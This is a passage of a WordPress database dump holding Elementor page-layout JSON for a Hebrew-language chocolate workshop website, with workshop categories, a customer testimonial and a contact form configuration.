\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(1295,261,'_elementor_version','0.4'),(1298,262,'_wp_page_template','elementor_header_footer'),(1299,262,'_elementor_edit_mode','builder'),(1300,262,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa 